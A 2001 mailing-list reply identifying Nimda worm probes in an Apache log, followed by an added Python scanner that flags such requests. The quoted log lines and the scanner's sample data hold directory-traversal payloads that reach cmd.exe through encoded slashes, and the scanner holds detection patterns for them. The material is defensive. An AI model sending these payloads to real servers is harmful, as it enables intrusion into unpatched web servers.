Re: Apache
On Wed, Sep 19, 2001 at 11:47:05AM +0200, Stefano Simonucci wrote:
> In the file
>
> /var/log/apache/access.log
> I found a string of messages like
>
> 193.204.30.153 - - [19/Sep/2001:11:40:12 +0200] "GET
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-"
> "-"
> 193.204.30.153 - - [19/Sep/2001:11:40:12 +0200] "GET
> /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-"
> "-"
> 193.204.30.153 - - [19/Sep/2001:11:40:12 +0200] "GET
> /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-"
> "-"
> 193.204.30.153 - - [19/Sep/2001:11:40:12 +0200] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-"
> "-"
> 193.204.30.153 - - [19/Sep/2001:11:40:12 +0200] "GET
> /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 287 "-"
> "-"
> 193.204.30.153 - - [19/Sep/2001:11:40:12 +0200] "GET
> /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 287 "-"
> "-"
> 193.204.30.153 - - [19/Sep/2001:11:40:12 +0200] "GET
> /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
> "-" "-"
> 193.204.30.153 - - [19/Sep/2001:11:40:12 +0200] "GET
> /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-"
>
> from various addresses (which started with 193.204 ... .... Mine is
> 193.204.9.228)
>
It's Nimda at work, Code Red's brother.
Obviously aimed at IIS.
Biko
--
------------------------------------------------------------------------------
I have learned that when a newborn first grasps his father's finger with
his little fist, he holds it trapped forever.
------------------------------------------------------------------------------
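
One way to flag requests like the ones quoted above in an Apache access log, as an added example that is not part of the original thread. The log lines are those from the message, re-joined onto single lines, plus one constructed benign entry; the function names are this example's own.

```python
import re
from urllib.parse import unquote_to_bytes

# Log lines quoted in the message above, re-joined onto one line each.
# The final /index.html entry is constructed here as a benign control.
SAMPLE_LOG = """\
193.204.30.153 - - [19/Sep/2001:11:40:12 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
193.204.30.153 - - [19/Sep/2001:11:40:12 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
193.204.30.153 - - [19/Sep/2001:11:40:12 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
193.204.30.153 - - [19/Sep/2001:11:40:12 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
193.204.30.153 - - [19/Sep/2001:11:40:12 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 287 "-" "-"
193.204.30.153 - - [19/Sep/2001:11:40:12 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 287 "-" "-"
193.204.30.153 - - [19/Sep/2001:11:40:12 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-"
193.204.30.153 - - [19/Sep/2001:11:40:12 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-"
192.0.2.10 - - [19/Sep/2001:11:41:00 +0200] "GET /index.html HTTP/1.0" 200 1024 "-" "-"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3})')

def decode_fully(path, max_rounds=5):
    # Percent-decode until stable; return (bytes, rounds that changed something).
    data, rounds = path.encode("latin-1"), 0
    while rounds < max_rounds and (nxt := unquote_to_bytes(data)) != data:
        data, rounds = nxt, rounds + 1
    return data, rounds

def classify(target):
    """Return the reasons a request target looks like the probes above."""
    data, rounds = decode_fully(target.split("?", 1)[0])
    reasons = []
    if rounds > 1:                          # e.g. %252f, %25%35%63, %%35c
        reasons.append("multi-encoded")
    if b"\xc0" in data or b"\xc1" in data:  # lead bytes never valid in UTF-8
        reasons.append("overlong-utf8")
    if b"cmd.exe" in data.lower():
        reasons.append("cmd.exe")
    return reasons

def scan(log_text):
    """Return (client_ip, status, reasons) for every suspicious line."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m and (reasons := classify(m.group(2))):
            hits.append((m.group(1), m.group(3), reasons))
    return hits

if __name__ == "__main__":
    for ip, status, reasons in scan(SAMPLE_LOG):
        print(ip, status, ",".join(reasons))
```

The 404 and 400 status codes in the hits show Apache rejecting the requests; the value of the scan is in counting sources and spotting infected hosts on the local network.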